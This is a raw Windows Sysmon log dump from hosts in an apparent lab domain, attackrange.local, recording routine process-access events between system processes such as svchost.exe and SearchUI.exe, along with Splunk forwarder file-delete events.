10341000x80000000000000001053962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.841{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.840{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.839{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\Sys
tem32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:45.676{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001053948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:45.560{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F7973FB19704ECBE215870B4F73AAFE,SHA256=2A5BE4FBFD1E3AE2E076248AFD9FC45D4BA10EBBD374A2DC52B7EA921891C066,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:46.933{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C14F59D3C6089283D387191B01CDE43,SHA256=24FFC8AABB407E144A1551E88C19C766AA46E64FF1125D9EB6AA73E6DFA0727B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.991{466BC892-02B0-60E8-1600-00000000CF01}13048524C:\Windows\System32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.991{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.976{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.976{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.960{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.960{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DA-60EB-DA7D-00000000CF01}9772C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 